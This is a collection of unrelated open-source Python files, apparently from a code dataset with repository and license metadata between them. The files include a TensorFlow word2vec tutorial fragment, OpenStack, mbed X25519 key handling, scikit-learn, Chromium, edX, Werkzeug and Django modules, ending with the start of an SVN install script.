print(statinfo.st_size)
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
filename = maybe_download('text8.zip', 31344016)
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words"""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
words = read_data(filename)
print('Data size', len(words))
# Step 2: Build the dictionary and replace rare words with UNK token.
vocabulary_size = 50000
def build_dataset(words):
count = [['UNK', -1]]
count.extend(collections.Counter(words).most_common(vocabulary_size - 1))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0 # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reverse_dictionary
data, count, dictionary, reverse_dictionary = build_dataset(words)
del words # Hint to reduce memory.
print('Most common words (+UNK)', count[:5])
print('Sample data', data[:10], [reverse_dictionary[i] for i in data[:10]])
data_index = 0
# Step 3: Function to generate a training batch for the skip-gram model.
def generate_batch(batch_size, num_skips, skip_window):
global data_index
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span)
for _ in range(span):
buffer.append(data[data_index])
data_index = (data_index + 1) % len(data)
for i in range(batch_size // num_skips):
target = skip_window # target label at the center of the buffer
targets_to_avoid = [skip_window]
for j in range(num_skips):
while target in targets_to_avoid:
target = random.randint(0, span - 1)
targets_to_avoid.append(target)
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[target]
buffer.append(data[data_index])
data_index = (data_index + 1) % len(data)
# Backtrack a little bit to avoid skipping words in the end of a batch
data_index = (data_index + len(data) - span) % len(data)
return batch, labels
batch, labels = generate_batch(batch_size=8, num_skips=2, skip_window=1)
for i in range(8):
print(batch[i], reverse_dictionary[batch[i]],
'->', labels[i, 0], reverse_dictionary[labels[i, 0]])
# Step 4: Build and train a skip-gram model.
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
# We pick a random validation set to sample nearest neighbors. Here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
num_sampled = 64 # Number of negative examples to sample.
graph = tf.Graph()
with graph.as_default():
# Input data.
train_inputs = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Ops and variables pinned to the CPU because of missing GPU implementation
with tf.device('/cpu:0'):
# Look up embeddings for inputs.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
# Construct the variables for the NCE loss
nce_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Compute the average NCE loss for the batch.
# tf.nce_loss automatically draws a new sample of the negative labels each
# time we evaluate the loss.
loss = tf.reduce_mean(
tf.nn.nce_loss(weights=nce_weights,
biases=nce_biases,
labels=train_labels,
inputs=embed,
num_sampled=num_sampled,
num_classes=vocabulary_size))
# Construct the SGD optimizer using a learning rate of 1.0.
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
# Compute the cosine similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(
valid_embeddings, normalized_embeddings, transpose_b=True)
# Add variable initializer.
init = tf.initialize_all_variables()
# Step 5: Begin training.
num_steps = 100001
with tf.Session(graph=graph) as session:
# We must initialize all variables before we use them.
init.run()
print("Initialized")
average_loss = 0
for step in xrange(num_steps):
batch_inputs, batch_labels = generate_batch(
batch_size, num_skips, skip_window)
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
# We perform one update step by evaluating the optimizer op (including it
# in the list of returned values for session.run()
_, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += loss_val
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print("Average loss at step ", step, ": ", average_loss)
average_loss = 0
# Note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in xrange(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k + 1]
log_str = "Nearest to %s:" % valid_word
for k in xrange(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = "%s %s," % (log_str, close_word)
print(log_str)
final_embeddings = normalized_embeddings.eval()
# Step 6: Visualize the embeddings.
def plot_with_labels(low_dim_embs, labels, filename='tsne.png'):
assert low_dim_embs.shape[0] >= len(labels), "More labels than embeddings"
plt.figure(figsize=(18, 18)) # in inches
for i, label in enumerate(labels):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.annotate(label,
xy=(x, y),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.savefig(filename)
try:
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)
plot_only = 500
low_dim_embs = tsne.fit_transform(final_embeddings[:plot_only, :])
labels = [reverse_dictionary[i] for i in xrange(plot_only)]
plot_with_labels(low_dim_embs, labels)
except ImportError:
print("Please install sklearn, matplotlib, and scipy to visualize embeddings.")
| apache-2.0 |
srajag/nova | nova/scheduler/baremetal_host_manager.py | 18 | 1522 | # Copyright (c) 2012 NTT DOCOMO, INC.
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manage hosts in the current zone.
"""
import nova.scheduler.base_baremetal_host_manager as bbhm
from nova.scheduler import host_manager
class BaremetalNodeState(bbhm.BaseBaremetalNodeState):
"""Mutable and immutable information tracked for a host.
This is an attempt to remove the ad-hoc data structures
previously used and lock down access.
"""
pass
class BaremetalHostManager(bbhm.BaseBaremetalHostManager):
"""Bare-Metal HostManager class."""
def host_state_cls(self, host, node, **kwargs):
"""Factory function/property to create a new HostState."""
compute = kwargs.get('compute')
if compute and compute.get('cpu_info') == 'baremetal cpu':
return BaremetalNodeState(host, node, **kwargs)
else:
return host_manager.HostState(host, node, **kwargs)
| apache-2.0 |
adfernandes/mbed | tools/psa/tfm/bin_utils/imgtool/keys/x25519.py | 5 | 3878 | # Original code taken from mcuboot project at:
# https://github.com/mcu-tools/mcuboot
# Git SHA of the original version: a8e12dae381080e898cea0c6f7408009b0163f9f
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
X25519 key management
"""
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import x25519
from .general import KeyClass
class X25519UsageError(Exception):
pass
class X25519Public(KeyClass):
def __init__(self, key):
self.key = key
def shortname(self):
return "x25519"
def _unsupported(self, name):
raise X25519UsageError("Operation {} requires private key".format(name))
def _get_public(self):
return self.key
def get_public_bytes(self):
# The key is embedded into MBUboot in "SubjectPublicKeyInfo" format
return self._get_public().public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
def get_private_bytes(self, minimal):
self._unsupported('get_private_bytes')
def export_private(self, path, passwd=None):
self._unsupported('export_private')
def export_public(self, path):
"""Write the public key to the given file."""
pem = self._get_public().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
with open(path, 'wb') as f:
f.write(pem)
def sig_type(self):
return "X25519"
def sig_tlv(self):
return "X25519"
def sig_len(self):
return 32
class X25519(X25519Public):
"""
Wrapper around an X25519 private key.
"""
def __init__(self, key):
"""key should be an instance of EllipticCurvePrivateKey"""
self.key = key
@staticmethod
def generate():
pk = x25519.X25519PrivateKey.generate()
return X25519(pk)
def _get_public(self):
return self.key.public_key()
def get_private_bytes(self, minimal):
return self.key.private_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption())
def export_private(self, path, passwd=None):
"""
Write the private key to the given file, protecting it with the
optional password.
"""
if passwd is None:
enc = serialization.NoEncryption()
else:
enc = serialization.BestAvailableEncryption(passwd)
pem = self.key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=enc)
with open(path, 'wb') as f:
f.write(pem)
def sign_digest(self, digest):
"""Return the actual signature"""
return self.key.sign(data=digest)
def verify_digest(self, signature, digest):
"""Verify that signature is valid for given digest"""
k = self.key
if isinstance(self.key, x25519.X25519PrivateKey):
k = self.key.public_key()
return k.verify(signature=signature, data=digest)
| apache-2.0 |
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sklearn/__init__.py | 2 | 3135 | """
Machine Learning module in python
=================================
sklearn is a Python module integrating classical machine
learning algorithms in the tightly-knit world of scientific Python
packages (numpy, scipy, matplotlib).
It aims to provide simple and efficient solutions to learning problems
that are accessible to everybody and reusable in various contexts:
machine-learning as a versatile tool for science and engineering.
See http://scikit-learn.sourceforge.net for complete documentation.
"""
import sys
__version__ = '0.12.1'
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages of sklearn when
# the binaries are not built
__SKLEARN_SETUP__
except NameError:
__SKLEARN_SETUP__ = False
if __SKLEARN_SETUP__:
sys.stderr.write('Partial import of sklearn during the build process.\n')
# We are not importing the rest of the scikit during the build
# process, as it may not be compiled yet
else:
from . import __check_build
from .base import clone
try:
from numpy.testing import nosetester
class _NoseTester(nosetester.NoseTester):
""" Subclass numpy's NoseTester to add doctests by default
"""
def test(self, label='fast', verbose=1, extra_argv=['--exe'],
doctests=True, coverage=False):
"""Run the full test suite
Examples
--------
This will run the test suite and stop at the first failing
example
>>> from sklearn import test
>>> test(extra_argv=['--exe', '-sx']) #doctest: +SKIP
"""
return super(_NoseTester, self).test(label=label, verbose=verbose,
extra_argv=extra_argv,
doctests=doctests, coverage=coverage)
try:
test = _NoseTester(raise_warnings="release").test
except TypeError:
# Older versions of numpy do not have a raise_warnings argument
test = _NoseTester().test
del nosetester
except:
pass
__all__ = ['cross_validation', 'cluster', 'covariance',
'datasets', 'decomposition', 'feature_extraction',
'feature_selection', 'semi_supervised',
'gaussian_process', 'grid_search', 'hmm', 'lda', 'linear_model',
'metrics', 'mixture', 'naive_bayes', 'neighbors', 'pipeline',
'preprocessing', 'qda', 'svm', 'test', 'clone', 'pls']
def setup_module(module):
"""Fixture for the tests to assure globally controllable seeding of RNGs
"""
import os
import numpy as np
import random
# It could have been provided in the environment
_random_seed = os.environ.get('SKLEARN_SEED', None)
if _random_seed is None:
_random_seed = np.random.uniform()*(2**31-1)
_random_seed = int(_random_seed)
print "I: Seeding RNGs with %r" % _random_seed
np.random.seed(_random_seed)
random.seed(_random_seed)
| agpl-3.0 |
ThinkingBridge/platform_external_chromium_org | build/android/pylib/base/base_test_result_unittest.py | 61 | 2679 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for TestRunResults."""
import unittest
from base_test_result import BaseTestResult
from base_test_result import TestRunResults
from base_test_result import ResultType
class TestTestRunResults(unittest.TestCase):
def setUp(self):
self.p1 = BaseTestResult('p1', ResultType.PASS, log='pass1')
other_p1 = BaseTestResult('p1', ResultType.PASS)
self.p2 = BaseTestResult('p2', ResultType.PASS)
self.f1 = BaseTestResult('f1', ResultType.FAIL, log='failure1')
self.c1 = BaseTestResult('c1', ResultType.CRASH, log='crash1')
self.u1 = BaseTestResult('u1', ResultType.UNKNOWN)
self.tr = TestRunResults()
self.tr.AddResult(self.p1)
self.tr.AddResult(other_p1)
self.tr.AddResult(self.p2)
self.tr.AddResults(set([self.f1, self.c1, self.u1]))
def testGetAll(self):
self.assertFalse(
self.tr.GetAll().symmetric_difference(
[self.p1, self.p2, self.f1, self.c1, self.u1]))
def testGetPass(self):
self.assertFalse(self.tr.GetPass().symmetric_difference(
[self.p1, self.p2]))
def testGetNotPass(self):
self.assertFalse(self.tr.GetNotPass().symmetric_difference(
[self.f1, self.c1, self.u1]))
def testGetAddTestRunResults(self):
tr2 = TestRunResults()
other_p1 = BaseTestResult('p1', ResultType.PASS)
f2 = BaseTestResult('f2', ResultType.FAIL)
tr2.AddResult(other_p1)
tr2.AddResult(f2)
tr2.AddTestRunResults(self.tr)
self.assertFalse(
tr2.GetAll().symmetric_difference(
[self.p1, self.p2, self.f1, self.c1, self.u1, f2]))
def testGetLogs(self):
log_print = ('[FAIL] f1:\n'
'failure1\n'
'[CRASH] c1:\n'
'crash1')
self.assertEqual(self.tr.GetLogs(), log_print)
def testGetShortForm(self):
short_print = ('ALL: 5 PASS: 2 FAIL: 1 '
'CRASH: 1 TIMEOUT: 0 UNKNOWN: 1 ')
self.assertEqual(self.tr.GetShortForm(), short_print)
def testGetLongForm(self):
long_print = ('ALL (5 tests)\n'
'PASS (2 tests)\n'
'FAIL (1 tests): [f1]\n'
'CRASH (1 tests): [c1]\n'
'TIMEOUT (0 tests): []\n'
'UNKNOWN (1 tests): [u1]')
self.assertEqual(self.tr.GetLongForm(), long_print)
def testRunPassed(self):
self.assertFalse(self.tr.DidRunPass())
tr2 = TestRunResults()
self.assertTrue(tr2.DidRunPass())
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
nanolearningllc/edx-platform-cypress-2 | lms/djangoapps/lms_xblock/test/test_runtime.py | 92 | 6099 | """
Tests of the LMS XBlock Runtime and associated utilities
"""
from django.contrib.auth.models import User
from django.conf import settings
from ddt import ddt, data
from mock import Mock
from unittest import TestCase
from urlparse import urlparse
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from lms.djangoapps.lms_xblock.runtime import quote_slashes, unquote_slashes, LmsModuleSystem
from xblock.fields import ScopeIds
TEST_STRINGS = [
'',
'foobar',
'foo/bar',
'foo/bar;',
'foo;;bar',
'foo;_bar',
'foo/',
'/bar',
'foo//bar',
'foo;;;bar',
]
@ddt
class TestQuoteSlashes(TestCase):
"""Test the quote_slashes and unquote_slashes functions"""
@data(*TEST_STRINGS)
def test_inverse(self, test_string):
self.assertEquals(test_string, unquote_slashes(quote_slashes(test_string)))
@data(*TEST_STRINGS)
def test_escaped(self, test_string):
self.assertNotIn('/', quote_slashes(test_string))
class TestHandlerUrl(TestCase):
"""Test the LMS handler_url"""
def setUp(self):
super(TestHandlerUrl, self).setUp()
self.block = Mock(name='block', scope_ids=ScopeIds(None, None, None, 'dummy'))
self.course_key = SlashSeparatedCourseKey("org", "course", "run")
self.runtime = LmsModuleSystem(
static_url='/static',
track_function=Mock(),
get_module=Mock(),
render_template=Mock(),
replace_urls=str,
course_id=self.course_key,
descriptor_runtime=Mock(),
)
def test_trailing_characters(self):
self.assertFalse(self.runtime.handler_url(self.block, 'handler').endswith('?'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler').endswith('/'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix').endswith('?'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix').endswith('/'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix', 'query').endswith('?'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler', 'suffix', 'query').endswith('/'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler', query='query').endswith('?'))
self.assertFalse(self.runtime.handler_url(self.block, 'handler', query='query').endswith('/'))
def _parsed_query(self, query_string):
"""Return the parsed query string from a handler_url generated with the supplied query_string"""
return urlparse(self.runtime.handler_url(self.block, 'handler', query=query_string)).query
def test_query_string(self):
self.assertIn('foo=bar', self._parsed_query('foo=bar'))
self.assertIn('foo=bar&baz=true', self._parsed_query('foo=bar&baz=true'))
self.assertIn('foo&bar&baz', self._parsed_query('foo&bar&baz'))
def _parsed_path(self, handler_name='handler', suffix=''):
"""Return the parsed path from a handler_url with the supplied handler_name and suffix"""
return urlparse(self.runtime.handler_url(self.block, handler_name, suffix=suffix)).path
def test_suffix(self):
self.assertTrue(self._parsed_path(suffix="foo").endswith('foo'))
self.assertTrue(self._parsed_path(suffix="foo/bar").endswith('foo/bar'))
self.assertTrue(self._parsed_path(suffix="/foo/bar").endswith('/foo/bar'))
def test_handler_name(self):
self.assertIn('handler1', self._parsed_path('handler1'))
self.assertIn('handler_a', self._parsed_path('handler_a'))
def test_thirdparty_fq(self):
"""Testing the Fully-Qualified URL returned by thirdparty=True"""
parsed_fq_url = urlparse(self.runtime.handler_url(self.block, 'handler', thirdparty=True))
self.assertEqual(parsed_fq_url.scheme, 'https')
self.assertEqual(parsed_fq_url.hostname, settings.SITE_NAME)
def test_not_thirdparty_rel(self):
"""Testing the Fully-Qualified URL returned by thirdparty=False"""
parsed_fq_url = urlparse(self.runtime.handler_url(self.block, 'handler', thirdparty=False))
self.assertEqual(parsed_fq_url.scheme, '')
self.assertIsNone(parsed_fq_url.hostname)
class TestUserServiceAPI(TestCase):
"""Test the user service interface"""
def setUp(self):
super(TestUserServiceAPI, self).setUp()
self.course_id = SlashSeparatedCourseKey("org", "course", "run")
self.user = User(username='runtime_robot', email='runtime_robot@edx.org', password='test', first_name='Robot')
self.user.save()
def mock_get_real_user(_anon_id):
"""Just returns the test user"""
return self.user
self.runtime = LmsModuleSystem(
static_url='/static',
track_function=Mock(),
get_module=Mock(),
render_template=Mock(),
replace_urls=str,
course_id=self.course_id,
get_real_user=mock_get_real_user,
descriptor_runtime=Mock(),
)
self.scope = 'course'
self.key = 'key1'
self.mock_block = Mock()
self.mock_block.service_declaration.return_value = 'needs'
def test_get_set_tag(self):
# test for when we haven't set the tag yet
tag = self.runtime.service(self.mock_block, 'user_tags').get_tag(self.scope, self.key)
self.assertIsNone(tag)
# set the tag
set_value = 'value'
self.runtime.service(self.mock_block, 'user_tags').set_tag(self.scope, self.key, set_value)
tag = self.runtime.service(self.mock_block, 'user_tags').get_tag(self.scope, self.key)
self.assertEqual(tag, set_value)
# Try to set tag in wrong scope
with self.assertRaises(ValueError):
self.runtime.service(self.mock_block, 'user_tags').set_tag('fake_scope', self.key, set_value)
# Try to get tag in wrong scope
with self.assertRaises(ValueError):
self.runtime.service(self.mock_block, 'user_tags').get_tag('fake_scope', self.key)
| agpl-3.0 |
morissette/devopsdays-hackathon-2016 | venv/lib/python2.7/site-packages/werkzeug/posixemulation.py | 364 | 3519 | # -*- coding: utf-8 -*-
r"""
werkzeug.posixemulation
~~~~~~~~~~~~~~~~~~~~~~~
Provides a POSIX emulation for some features that are relevant to
web applications. The main purpose is to simplify support for
systems such as Windows NT that are not 100% POSIX compatible.
Currently this only implements a :func:`rename` function that
follows POSIX semantics. Eg: if the target file already exists it
will be replaced without asking.
This module was introduced in 0.6.1 and is not a public interface.
It might become one in later versions of Werkzeug.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import sys
import os
import errno
import time
import random
from ._compat import to_unicode
from .filesystem import get_filesystem_encoding
can_rename_open_file = False
if os.name == 'nt': # pragma: no cover
_rename = lambda src, dst: False
_rename_atomic = lambda src, dst: False
try:
import ctypes
_MOVEFILE_REPLACE_EXISTING = 0x1
_MOVEFILE_WRITE_THROUGH = 0x8
_MoveFileEx = ctypes.windll.kernel32.MoveFileExW
def _rename(src, dst):
src = to_unicode(src, get_filesystem_encoding())
dst = to_unicode(dst, get_filesystem_encoding())
if _rename_atomic(src, dst):
return True
retry = 0
rv = False
while not rv and retry < 100:
rv = _MoveFileEx(src, dst, _MOVEFILE_REPLACE_EXISTING |
_MOVEFILE_WRITE_THROUGH)
if not rv:
time.sleep(0.001)
retry += 1
return rv
# new in Vista and Windows Server 2008
_CreateTransaction = ctypes.windll.ktmw32.CreateTransaction
_CommitTransaction = ctypes.windll.ktmw32.CommitTransaction
_MoveFileTransacted = ctypes.windll.kernel32.MoveFileTransactedW
_CloseHandle = ctypes.windll.kernel32.CloseHandle
can_rename_open_file = True
def _rename_atomic(src, dst):
ta = _CreateTransaction(None, 0, 0, 0, 0, 1000, 'Werkzeug rename')
if ta == -1:
return False
try:
retry = 0
rv = False
while not rv and retry < 100:
rv = _MoveFileTransacted(src, dst, None, None,
_MOVEFILE_REPLACE_EXISTING |
_MOVEFILE_WRITE_THROUGH, ta)
if rv:
rv = _CommitTransaction(ta)
break
else:
time.sleep(0.001)
retry += 1
return rv
finally:
_CloseHandle(ta)
except Exception:
pass
def rename(src, dst):
# Try atomic or pseudo-atomic rename
if _rename(src, dst):
return
# Fall back to "move away and replace"
try:
os.rename(src, dst)
except OSError as e:
if e.errno != errno.EEXIST:
raise
old = "%s-%08x" % (dst, random.randint(0, sys.maxint))
os.rename(dst, old)
os.rename(src, dst)
try:
os.unlink(old)
except Exception:
pass
else:
rename = os.rename
can_rename_open_file = True
| gpl-3.0 |
yephper/django | django/contrib/gis/db/backends/spatialite/introspection.py | 1 | 3203 | from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.sqlite3.introspection import (
DatabaseIntrospection, FlexibleFieldLookupDict,
)
from django.utils import six
class GeoFlexibleFieldLookupDict(FlexibleFieldLookupDict):
"""
Sublcass that includes updates the `base_data_types_reverse` dict
for geometry field types.
"""
base_data_types_reverse = FlexibleFieldLookupDict.base_data_types_reverse.copy()
base_data_types_reverse.update(
{'point': 'GeometryField',
'linestring': 'GeometryField',
'polygon': 'GeometryField',
'multipoint': 'GeometryField',
'multilinestring': 'GeometryField',
'multipolygon': 'GeometryField',
'geometrycollection': 'GeometryField',
})
class SpatiaLiteIntrospection(DatabaseIntrospection):
data_types_reverse = GeoFlexibleFieldLookupDict()
def get_geometry_type(self, table_name, geo_col):
cursor = self.connection.cursor()
try:
# Querying the `geometry_columns` table to get additional metadata.
type_col = 'type' if self.connection.ops.spatial_version < (4, 0, 0) else 'geometry_type'
cursor.execute('SELECT coord_dimension, srid, %s '
'FROM geometry_columns '
'WHERE f_table_name=%%s AND f_geometry_column=%%s' % type_col,
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise Exception('Could not find a geometry column for "%s"."%s"' %
(table_name, geo_col))
# OGRGeomType does not require GDAL and makes it easy to convert
# from OGC geom type name to Django field.
ogr_type = row[2]
if isinstance(ogr_type, six.integer_types) and ogr_type > 1000:
# Spatialite versions >= 4 use the new SFSQL 1.2 offsets
# 1000 (Z), 2000 (M), and 3000 (ZM) to indicate the presence of
# higher dimensional coordinates (M not yet supported by Django).
ogr_type = ogr_type % 1000 + OGRGeomType.wkb25bit
field_type = OGRGeomType(ogr_type).django
# Getting any GeometryField keyword arguments that are not the default.
dim = row[0]
srid = row[1]
field_params = {}
if srid != 4326:
field_params['srid'] = srid
if (isinstance(dim, six.string_types) and 'Z' in dim) or dim == 3:
field_params['dim'] = 3
finally:
cursor.close()
return field_type, field_params
def get_indexes(self, cursor, table_name):
indexes = super(SpatiaLiteIntrospection, self).get_indexes(cursor, table_name)
cursor.execute('SELECT f_geometry_column '
'FROM geometry_columns '
'WHERE f_table_name=%s AND spatial_index_enabled=1', (table_name,))
for row in cursor.fetchall():
indexes[row[0]] = {'primary_key': False, 'unique': False}
return indexes
| bsd-3-clause |
guettli/django | django/apps/config.py | 6 | 8251 | import os
from importlib import import_module
from django.core.exceptions import ImproperlyConfigured
from django.utils._os import upath
from django.utils.module_loading import module_has_submodule
MODELS_MODULE_NAME = 'models'
class AppConfig(object):
"""
Class representing a Django application and its configuration.
"""
def __init__(self, app_name, app_module):
# Full Python path to the application eg. 'django.contrib.admin'.
self.name = app_name
# Root module for the application eg. <module 'django.contrib.admin'
# from 'django/contrib/admin/__init__.pyc'>.
self.module = app_module
# Reference to the Apps registry that holds this AppConfig. Set by the
# registry when it registers the AppConfig instance.
self.apps = None
# The following attributes could be defined at the class level in a
# subclass, hence the test-and-set pattern.
# Last component of the Python path to the application eg. 'admin'.
# This value must be unique across a Django project.
if not hasattr(self, 'label'):
self.label = app_name.rpartition(".")[2]
# Human-readable name for the application eg. "Admin".
if not hasattr(self, 'verbose_name'):
self.verbose_name = self.label.title()
# Filesystem path to the application directory eg.
# u'/usr/lib/python2.7/dist-packages/django/contrib/admin'. Unicode on
# Python 2 and a str on Python 3.
if not hasattr(self, 'path'):
self.path = self._path_from_module(app_module)
# Module containing models eg. <module 'django.contrib.admin.models'
# from 'django/contrib/admin/models.pyc'>. Set by import_models().
# None if the application doesn't have a models module.
self.models_module = None
# Mapping of lower case model names to model classes. Initially set to
# None to prevent accidental access before import_models() runs.
self.models = None
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.label)
def _path_from_module(self, module):
"""Attempt to determine app's filesystem path from its module."""
# See #21874 for extended discussion of the behavior of this method in
# various cases.
# Convert paths to list because Python 3's _NamespacePath does not
# support indexing.
paths = list(getattr(module, '__path__', []))
if len(paths) != 1:
filename = getattr(module, '__file__', None)
if filename is not None:
paths = [os.path.dirname(filename)]
else:
# For unknown reasons, sometimes the list returned by __path__
# contains duplicates that must be removed (#25246).
paths = list(set(paths))
if len(paths) > 1:
raise ImproperlyConfigured(
"The app module %r has multiple filesystem locations (%r); "
"you must configure this app with an AppConfig subclass "
"with a 'path' class attribute." % (module, paths))
elif not paths:
raise ImproperlyConfigured(
"The app module %r has no filesystem location, "
"you must configure this app with an AppConfig subclass "
"with a 'path' class attribute." % (module,))
return upath(paths[0])
@classmethod
def create(cls, entry):
"""
Factory that creates an app config from an entry in INSTALLED_APPS.
"""
try:
# If import_module succeeds, entry is a path to an app module,
# which may specify an app config class with default_app_config.
# Otherwise, entry is a path to an app config class or an error.
module = import_module(entry)
except ImportError:
# Track that importing as an app module failed. If importing as an
# app config class fails too, we'll trigger the ImportError again.
module = None
mod_path, _, cls_name = entry.rpartition('.')
# Raise the original exception when entry cannot be a path to an
# app config class.
if not mod_path:
raise
else:
try:
# If this works, the app module specifies an app config class.
entry = module.default_app_config
except AttributeError:
# Otherwise, it simply uses the default app config class.
return cls(entry, module)
else:
mod_path, _, cls_name = entry.rpartition('.')
# If we're reaching this point, we must attempt to load the app config
# class located at <mod_path>.<cls_name>
mod = import_module(mod_path)
try:
cls = getattr(mod, cls_name)
except AttributeError:
if module is None:
# If importing as an app module failed, that error probably
# contains the most informative traceback. Trigger it again.
import_module(entry)
else:
raise
# Check for obvious errors. (This check prevents duck typing, but
# it could be removed if it became a problem in practice.)
if not issubclass(cls, AppConfig):
raise ImproperlyConfigured(
"'%s' isn't a subclass of AppConfig." % entry)
# Obtain app name here rather than in AppClass.__init__ to keep
# all error checking for entries in INSTALLED_APPS in one place.
try:
app_name = cls.name
except AttributeError:
raise ImproperlyConfigured(
"'%s' must supply a name attribute." % entry)
# Ensure app_name points to a valid module.
try:
app_module = import_module(app_name)
except ImportError:
raise ImproperlyConfigured(
"Cannot import '%s'. Check that '%s.%s.name' is correct." % (
app_name, mod_path, cls_name,
)
)
# Entry is a path to an app config class.
return cls(app_name, app_module)
def get_model(self, model_name, require_ready=True):
"""
Returns the model with the given case-insensitive model_name.
Raises LookupError if no model exists with this name.
"""
if require_ready:
self.apps.check_models_ready()
else:
self.apps.check_apps_ready()
try:
return self.models[model_name.lower()]
except KeyError:
raise LookupError(
"App '%s' doesn't have a '%s' model." % (self.label, model_name))
def get_models(self, include_auto_created=False, include_swapped=False):
"""
Returns an iterable of models.
By default, the following models aren't included:
- auto-created models for many-to-many relations without
an explicit intermediate table,
- models created to satisfy deferred attribute queries,
- models that have been swapped out.
Set the corresponding keyword argument to True to include such models.
Keyword arguments aren't documented; they're a private API.
"""
self.apps.check_models_ready()
for model in self.models.values():
if model._meta.auto_created and not include_auto_created:
continue
if model._meta.swapped and not include_swapped:
continue
yield model
def import_models(self):
# Dictionary of models for this app, primarily maintained in the
# 'all_models' attribute of the Apps this AppConfig is attached to.
self.models = self.apps.all_models[self.label]
if module_has_submodule(self.module, MODELS_MODULE_NAME):
models_module_name = '%s.%s' % (self.name, MODELS_MODULE_NAME)
self.models_module = import_module(models_module_name)
def ready(self):
"""
Override this method in subclasses to run code when Django starts.
"""
| bsd-3-clause |
tamsekar/eazy-deploy | svn/svn-install.py | 1 | 1095 | #!/usr/bin/env python
from sys import platform
import subprocess
from subprocess import Popen, PIPE
import sys
def platform_check():
if platform == "linux" or platform == "linux2":
print "Linux"
